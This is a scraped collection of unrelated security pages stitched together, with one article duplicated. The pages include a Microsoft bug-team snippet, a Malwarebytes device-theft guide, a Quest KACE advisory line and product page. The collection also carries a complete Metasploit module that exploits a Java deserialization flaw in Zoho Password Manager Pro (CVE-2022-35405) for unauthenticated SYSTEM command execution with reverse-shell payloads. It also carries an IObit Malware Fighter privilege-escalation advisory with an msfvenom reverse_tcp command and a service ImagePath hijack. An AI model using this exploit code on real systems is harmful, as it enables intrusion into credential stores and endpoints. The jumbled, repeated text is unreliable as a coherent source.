“In some companies it’s like, well, we build a web application, we’re sort of constrained on the tools we have or the expertise in the company,” he says. “At Microsoft, we have everything from silicon to compilers to the operating system. You don’t really have good excuses for why you can’t do something.”

For the Morse team, though, this means there’s no room to squander that rarified position.

The Microsoft Team Racing to Catch Bugs Before They Happen

This Metasploit module exploits a Java deserialization vulnerability in Zoho ManageEngine Pro before 12101 and PAM360 before 5510. Unauthenticated attackers can send a crafted XML-RPC request containing malicious serialized data to /xmlrpc to gain remote command execution as the SYSTEM user.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::JavaDeserialization  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Zoho Password Manager Pro XML-RPC Java Deserialization',        'Description' => %q{          This module exploits a Java deserialization vulnerability in Zoho ManageEngine Pro          before 12101 and PAM360 before 5510. Unauthenticated attackers can send a          crafted XML-RPC request containing malicious serialized data to /xmlrpc to          gain RCE as the SYSTEM user.        },        'Author' => [          'Vinicius', # Discovery          'Y4er', # Writeup          'Grant Willcox' # Exploit        ],        'References' => [          ['CVE', '2022-35405'],          ['URL', 'https://xz.aliyun.com/t/11578'], # Writeup          ['URL', 'https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html'], # Advisory          ['URL', 'https://archives2.manageengine.com/passwordmanagerpro/12101/ManageEngine_PasswordManager_Pro_12100_to_12101.ppm'] # The patch.        ],        'DisclosureDate' => '2022-06-24', # Vendor release date of patch and new installer, as advisory lacks any date.        'License' => MSF_LICENSE,        'Platform' => ['win'],        'Arch' => [ARCH_CMD, ARCH_X64],        'Privileged' => true,        'Targets' => [          [            'Windows EXE Dropper',            {              'Arch' => ARCH_X64,              'Type' => :windows_dropper,              'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' }            }          ],          [            'Windows Command',            {              'Arch' => ARCH_CMD,              'Type' => :windows_command,              'Space' => 3000,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/reverse_powershell' }            }          ],          [            'Windows Powershell',            {              'Arch' => ARCH_X64,              'Type' => :windows_powershell,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell/x64/meterpreter/reverse_tcp' }            }          ]        ],        'DefaultTarget' => 1,        'DefaultOptions' => {          'SSL' => true        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      Opt::RPORT(7272),      OptString.new('TARGETURI', [true, 'Base path', '/'])    ])  end  def check    # Send an empty serialized object    res = send_request_xmlrpc('')    unless res      return CheckCode::Unknown('Target did not respond to check.')    end    if res.body.include?('Failed to read result object: null')      return CheckCode::Vulnerable('Target can deserialize arbitrary data.')    end    CheckCode::Safe('Target cannot deserialize arbitrary data.')  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :windows_command      execute_command(payload.encoded)    when :windows_dropper      cmd_target = targets.select { |target| target['Type'] == :windows_command }.first      execute_cmdstager({ linemax: cmd_target.opts['Space'] })    when :windows_powershell      execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))    end  end  def execute_command(cmd, _opts = {})    vprint_status("Executing command: #{cmd}")    res = send_request_xmlrpc(      generate_java_deserialization_for_command('CommonsBeanutils1', 'cmd', cmd)    )    unless res && res.code == 200      fail_with(Failure::UnexpectedReply, "Failed to execute command: #{cmd}")    end    print_good("Successfully executed command: #{cmd}")  end  def send_request_xmlrpc(data)    # http://xmlrpc.com/    # https://ws.apache.org/xmlrpc/    send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/xmlrpc'),      'ctype' => 'text/xml',      'data' => <<~XML        <?xml version="1.0"?>        <methodCall>          <methodName>#{rand_text_alphanumeric(8..42)}</methodName>          <params>            <param>              <value>                <struct>                  <member>                    <name>#{rand_text_alphanumeric(8..42)}</name>                    <value>                      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">#{Rex::Text.encode_base64(data)}</serializable>                    </value>                  </member>                </struct>              </value>            </param>          </params>        </methodCall>      XML    )  endend

Zoho Password Manager Pro XML-RPC Java Deserialization

IObit Malware Fighter version 9.2 fails to provide sufficient anti-tampering protection and that shortcoming can be leveraged to escalate to SYSTEM privileges.

    [+] Credits: Yehia Elghaly (aka Mrvar0x)    [+] Website: https://mrvar0x.com/[+] Source:  "https://mrvar0x.com/2022/08/02/multiple-endpoints-security-tampering-exploit/"Vendor:=============www.iobit.comProduct:===========IObit Malware Fighter 9.2 IObit Malware Fighter is an advanced malware & spyware removal utility that detects, removes the deepest infections, and protects the PC from various of potential malware, ransomware, cryptojacking, spyware, adware, trojans, keyloggers, bots, worms, and hijackers, etc. It includes the unique "Dual-Core" engine, driver-level technology and the heuristic malware detection.Safebox can protect users from ransomware and allow users to lock their personal data with a password.Vulnerability Type:===================Missing Tamper ProtectionIncorrect AuthorizationCVE Reference:==============N/ASecurity Issue:================IObit Malware Fighter prior to version 9.2  installed on Microsoft Windows does not provide sufficient anti-tampering protection of services by users with Administrator privileges. This could result in a user disabling IObit Malware Fighter and the protection offered by it. Also It lead to Raised privilege to SYSTEM.That can occurred by modifying a specific registry key.Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\AdvancedSystemCareService15Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\IMFserviceChange ImagePath path to a malicious executable.Exploit/POC:=============Create malicious executable through msfvenommsfvenom -p windows/meterpreter/reverse_tcp LHOST=$LOCALIP LPORT=4444 -f exe -o meta.exeModify (ImagePath) with the path of the malicious executable - RestartNetwork Access:===============LocalSeverity:=========High[+] DisclaimerThe author is not responsible for any misuse of the information contained herein and accepts no responsibilityfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related informationor exploits by the author or elsewhere. All content (c).Mrvar0x

IObit Malware Fighter 9.2 Tampering / Privilege Escalation

We give you some tips as you gear up to return to school or college to ward off theft, and limit the impact should the worst happen.
The post How to protect yourself and your kids against device theft appeared first on Malwarebytes Labs.

Posted: August 3, 2022 by  
Last updated: July 21, 2022

In no time at all, kids will be going back to school or starting college. And while gearing up for this, it’s very important to be aware of the threat from device loss in the school environment.

Maybe you are away at university for the first time and have a new place to live, or maybe your kids have devices they take into school. Whatever the reason, if you lose a device or it gets stolen, the end result can be quite serious—from loss of sensitive data, wasted time and misplaced work, to blackmail or harassment if the data is unencrypted.

And it’s not just one piece of technology to worry about. Students are likely to own tablets, laptops, and mobile phones at the bare minimum. It’s tricky to juggle all the potential privacy and security pitfalls when dealing with so many pieces of technology…but it can be done!

**How to protect yourself against mobile device theft**

A phone is much easier to lose track of in school or on campus than a much larger device like a laptop. It’s also a great target for thieves for precisely the same reason. Depending on the model, your device likely contains a wealth of security options. Here’s what you can do in advance to take the sting out of a mobile theft.

*   **Lock your device**. Your lockscreen should serve as the barrier between you and your data. This is because it’ll also serve as the barrier between your device and other people. Protect it with a passcode, or biometrics (such as your thumbprint, your faceprint, or even a scan of your eye). Should someone steal your phone or simply pick it up off the ground after you drop it, they won’t be able to access your data.
*   **Encrypt your data**. If your device isn’t encrypted, the information on it is potentially at risk if the phone is stolen. Once encrypted, everything on the device is scrambled in a way which requires the correct PIN to access the secured data. Older versions of Android used something called Full-Disk encryption. Newer versions use File-based encryption. iPhones and iPads have encryption as standard when using Face or Touch ID, or a passcode. You can check by going to **Settings > Face ID/TouchID & Passcode**. If you scroll to the bottom you should see “Data Protection is enabled”
*   **Turn on Find my phone**. This option is hidden away in the security settings of most Androids, and you may need to dig around a little to find it. It does what it suggests, using a combination of several forms of technology to locate the missing device. On Apple products, it’s likely to be turned on by default, but you can check by navigating to the “Find My” app.

**How to protect yourself against laptop theft**

Laptops aren’t quite as easy to make disappear as a mobile device, but it does happen! Here are some of the ways you can prevent laptop theft while on campus or out and about between classes.

*   **Don’t neglect physical security**. Never leave your laptop bag unattended, even for a second. Going back to the counter for another coffee? Take it with you. Need to go to the bathroom? Pack your laptop away, and take it with you. Sitting at a table with your bag on the floor? Put one foot through the laptop bag’s strap, so if someone tries to snatch it they won’t be able to.
*   **Observe campus rules**. If the laptop you’re using is campus supplied, the device may be encrypted by default. There may well be security tools present to help fend off potential malware infections, but there may be nothing available to remedy loss or theft, such as location tracking. While it may be tempting to install a third-party tracking tool, your school or university will have policies with regard to what you can, or cannot, install. If in doubt, ask IT for assistance.
*   **Encrypt your device (again**). If you’re using a Windows operating system, you have a couple of options available. You could, for example, make use of BitLocker. If you’re running Windows Home, you may well have to consider using a third-party alternative because BitLocker isn’t available. On Macs, you can use FileVault to encrypt your device.
*   **Turn on Find your device**. This works in a similar fashion to trace tools for lost mobiles and should be set up when you first get your device. On Windows, navigate to **Start** > **Settings** > **Update & Security** > **Find my device**, and then select “**Change**” to finish configuring. On Mac, navigate to **System Preferences > AppleID > iCloud**. Select **Find My Mac** and click **Allow**.

****A tip for both mobiles and laptops****

No matter what you’re taking on campus, remember to backup your data. Device loss is bad enough, but losing everything on the device makes it even worse. Get into the routine of backing up data daily.

Your mobile may also have the option of cloud backups. Take care to check how the data is stored, if it’s encrypted, and if it eventually expires. There may well be a limited amount of space available, or it could eat into some of your data allowance.

There are more options on the desktop. You could use removable storage, additional hard drives, local desktop backups, and more. There are also various cloud-based options available like Dropbox and Google Drive, and it’s worth noting that many of these services will also work on mobile too.

**RELATED ARTICLES**

September 2, 2020 - With the pandemic in full swing, many US schools are empty, or rather, full of distance learners. How can parents make sure their kids stay secure in virtual instruction?

September 9, 2019 - A roundup of the latest cybersecurity news for the week of September 2 – 8, including TrickBot’s new trick, a social engineering toolkit, and how to keep remote workers safe.

August 14, 2017 - When you buy your child new devices, it's important to lay down some ground rules—especially when it comes to security. That's why we're providing you with a cybersecurity checklist you can use to prepare your children for the coming school year.

August 15, 2015 - Ahhhhh, back-to-school. The smell of freshly sharpened pencils. Blank notebooks and backpacks free of bottom-of-the-bag schmutz. New books with crackling spines. And, most importantly, your very own computer. Owning your own computer is a huge investment. It’ll hold all of your schoolwork, your photos, your browsing history. You don’t have to worry about clearing the...

**ABOUT THE AUTHOR**

Christopher Boyd  
Lead Malware Intelligence Analyst

Former Director of Research at FaceTime Security Labs. He has a very particular set of skills. Skills that make him a nightmare for threats like you.

How to protect yourself and your kids against device theft

Categories: Awareness
Tags: back to school

Tags: device

Tags: encryption

Tags: Mobile

Tags: school

Tags: theft

Tags: university

We give you some tips as you gear up to return to school or college to ward off theft, and limit the impact should the worst happen.



(Read more...)




The post How to protect yourself and your kids against device theft appeared first on Malwarebytes Labs.

In no time at all, kids will be going back to school or starting college. And while gearing up for this, it’s very important to be aware of the threat from device loss in the school environment.

Maybe you are away at university for the first time and have a new place to live, or maybe your kids have devices they take into school. Whatever the reason, if you lose a device or it gets stolen, the end result can be quite serious—from loss of sensitive data, wasted time and misplaced work, to blackmail or harassment if the data is unencrypted.

And it's not just one piece of technology to worry about. Students are likely to own tablets, laptops, and mobile phones at the bare minimum. It’s tricky to juggle all the potential privacy and security pitfalls when dealing with so many pieces of technology…but it can be done!

**How to protect yourself against mobile device theft**

A phone is much easier to lose track of in school or on campus than a much larger device like a laptop. It’s also a great target for thieves for precisely the same reason. Depending on the model, your device likely contains a wealth of security options. Here’s what you can do in advance to take the sting out of a mobile theft.

*   **Lock your device**. Your lockscreen should serve as the barrier between you and your data. This is because it’ll also serve as the barrier between your device and other people. Protect it with a passcode, or biometrics (such as your thumbprint, your faceprint, or even a scan of your eye). Should someone steal your phone or simply pick it up off the ground after you drop it, they won’t be able to access your data.
*   **Encrypt your data**. If your device isn’t encrypted, the information on it is potentially at risk if the phone is stolen. Once encrypted, everything on the device is scrambled in a way which requires the correct PIN to access the secured data. Older versions of Android used something called Full-Disk encryption. Newer versions use File-based encryption. iPhones and iPads have encryption as standard when using Face or Touch ID, or a passcode. You can check by going to **Settings > Face ID/TouchID & Passcode**. If you scroll to the bottom you should see "Data Protection is enabled"
*   **Turn on Find my phone**. This option is hidden away in the security settings of most Androids, and you may need to dig around a little to find it. It does what it suggests, using a combination of several forms of technology to locate the missing device. On Apple products, it's likely to be turned on by default, but you can check by navigating to the "Find My" app.

**How to protect yourself against laptop theft**

Laptops aren’t quite as easy to make disappear as a mobile device, but it does happen! Here are some of the ways you can prevent laptop theft while on campus or out and about between classes.

*   **Don’t neglect physical security**. Never leave your laptop bag unattended, even for a second. Going back to the counter for another coffee? Take it with you. Need to go to the bathroom? Pack your laptop away, and take it with you. Sitting at a table with your bag on the floor? Put one foot through the laptop bag’s strap, so if someone tries to snatch it they won’t be able to.
*   **Observe campus rules**. If the laptop you’re using is campus supplied, the device may be encrypted by default. There may well be security tools present to help fend off potential malware infections, but there may be nothing available to remedy loss or theft, such as location tracking. While it may be tempting to install a third-party tracking tool, your school or university will have policies with regard to what you can, or cannot, install. If in doubt, ask IT for assistance.
*   **Encrypt your device (again**). If you’re using a Windows operating system, you have a couple of options available. You could, for example, make use of BitLocker. If you’re running Windows Home, you may well have to consider using a third-party alternative because BitLocker isn’t available. On Macs, you can use FileVault to encrypt your device.
*   **Turn on Find your device**. This works in a similar fashion to trace tools for lost mobiles and should be set up when you first get your device. On Windows, navigate to **Start** > **Settings** > **Update & Security** > **Find my device**, and then select “**Change**” to finish configuring. On Mac, navigate to **System Preferences > AppleID > iCloud**. Select **Find My Mac** and click **Allow**.

****A tip for both mobiles and laptops****

No matter what you’re taking on campus, remember to backup your data. Device loss is bad enough, but losing everything on the device makes it even worse. Get into the routine of backing up data daily.

Your mobile may also have the option of cloud backups. Take care to check how the data is stored, if it’s encrypted, and if it eventually expires. There may well be a limited amount of space available, or it could eat into some of your data allowance.

There are more options on the desktop. You could use removable storage, additional hard drives, local desktop backups, and more. There are also various cloud-based options available like Dropbox and Google Drive, and it’s worth noting that many of these services will also work on mobile too.

In Quest KACE Systems Management Appliance (SMA) through 12.0, a hash collision is possible during authentication. This may allow authentication with invalid credentials.

For the best web experience, please use IE11+, Chrome, Firefox, or Safari

*   Resources
*   Blogs
    
    *   IT Industry Insights
    *   Quest Solution Blogs
        *   Data Protection
        *   Data Management
        *   Microsoft Platform Management
        *   Performance Monitoring
        *   Unified Endpoint Management
        *   IT Ninja
        *   Toad World Blog
    
*   Forums
*   
*   *   United States (English)
    *   Brazil (Português)
    *   China (中文)
    *   France (Français)
    *   Germany (Deutsch)
    *   Japan (日本語)
    *   Mexico (Español)
    
*   
*   *   Account Settings
    

Products

**Products****By Product Category**

Solutions

**Solutions**

*   **Automate backup & disaster recovery**
    
    Restore business operations, data integrity and customer trust in minutes or hours instead of weeks or months
    
*   **Become data driven**
    
    Empower enterprise stakeholders to use data assets strategically for data operations, data protection and data governance
    
*   **Gain comprehensive data protection**
    
    Protect and recover all your systems, applications and data while reducing backup storage costs
    
*   **Improve your cybersecurity posture**
    
    Achieve identity-centric cybersecurity to protect the people, applications and data that are essential to business
    
*   **Migrate & consolidate Microsoft workloads**
    
    Conquer your next migration (now and in the future) by making it a non-event for end users
    
*   **Protect and secure your endpoints**
    
    Discover, manage and secure evolving hybrid workforce environments
    
*   **Strengthen hybrid AD & Microsoft 365 security**
    
    Detect, defend against and recover from cyber attacks and insider threats
    

About

*   Why Quest
*   Leadership
*   Customer Stories
*   News
*   Careers
*   Contact Us

Home / KACE Unified Endpoint Management

KACE® by Quest supports your unified endpoint management (UEM) strategy by helping you discover and track every device in your environment, automate administrative tasks, keep compliance requirements up-to-date and secure your network from a range of cyberthreats. With KACE, you can effectively address your endpoint management needs with individual products for specific tasks or as an integrated UEM solution.

**Key benefits**

**Discover**

Centralize systems management while gaining visibility and control through a single view of your assets

**Manage**

Efficiently manage your endpoint landscape and lifecycle while reducing complexity and automating tasks

**Secure**

Protect your endpoints while minimizing the risks of non-compliance with data protection and licensing requirements

**KACE Product Portfolio**

 02:41

**KACE Unified Endpoint Manager**

KACE Unified Endpoint Manager unites traditional endpoint management with modern management in a shared intuitive interface. Discover, manage and secure all your endpoints from one console as you co-manage your traditional and modern endpoints, including Windows and Mac laptops, and iOS and Android mobile devices. 

**Key Features**

*   Scan to discover devices and remotely provision them
*   Access a detailed inventory of data on each traditional device
*   Define policies and administrative functions for a single device or group of devices
*   Autonomously track, deploy and maintain current versions of software and applications
*   Automate patch identification and deployment

 01:58

 01:54

 01:37

**KACE Cloud Mobile Device Manager**

Inventory, manage and secure the mobile devices in your environment with KACE Cloud Mobile Device Manager. Get a simple, straightforward, cloud-based solution for mobile device management. Enjoy single-pane-of-glass management for both mobile and traditional devices when combined with the KACE Systems Management Appliance.

**Key Features**

*   Powerful device control
*   BYOD and company-owned device support
*   Android and iOS Support

 02:01

**KACE Desktop Authority**

Use KACE Desktop Authority to eliminate the hassle of deploying and securing network-connected devices by customizing them at first login. Easily configure firewall and browser security settings for physical, virtual and published Windows environments. Ensure that applications are maintained and access to network resources is always available.

**Key Features**

*   Flexible criteria-based settings and configurations
*   Windows environment management
*   Remote user support
*   Device security

 02:00

**KACE Privilege Manager**

Maintain a least-privileged, GDPR-compliant environment with KACE Privilege Manager. Quickly elevate and manage your organization’s end users and administrative rights. Give users an easier and more affordable way to maintain security using self-service capabilities in a locked-down PC environment.

**Key Features**

*   Elevation on-demand
*   Criteria-based assignment of access rights
*   Digital certification verification
*   Application blacklisting

 01:26

**RemoteScan**

Simplify your document scanning workflow and make sure that images are securely stored on the server and not at the endpoint with RemoteScan. Support remote desktop scanning for terminal server and cloud environments while easily meeting compliance requirements by using secure virtual channels to transmit scanned images at fast scanning speeds, even over complex networks.

**Key Features**

*   Supports TWAIN scanning software applications
*   Connects scanners in remote desktop environments
*   Complies with enterprise requirements
*   Supports TWAIN, WIA and ScanSnap drivers

**Resources**

**Awards**

**St. Dominic Hospital**

The KACE Systems Management Appliance has made life a whole lot easier. We can see asset information and software details, down to the version. I mean, it's been the ultimate timesaver.

Rudy Bracey Systems Administrator, St. Dominic Hospital Read Case Study

**Coastal Community Credit Union**

KACE is a one-stop shop for our biggest IT needs. Sabrina Geoffroy, Technical Business Analyst, Coastal Community Credit Union

Sabrina Geoffroy Technical Business Analyst, Coastal Community Credit Union Read Case Study

**Maniilaq Association**

I know I implemented RemoteScan in a brand-new way, but the software was flexible enough to allow it. That was the big bonus

Wayne Hogue VMware Administrator, Maniilaq Association Read Case Study

Tag

#windows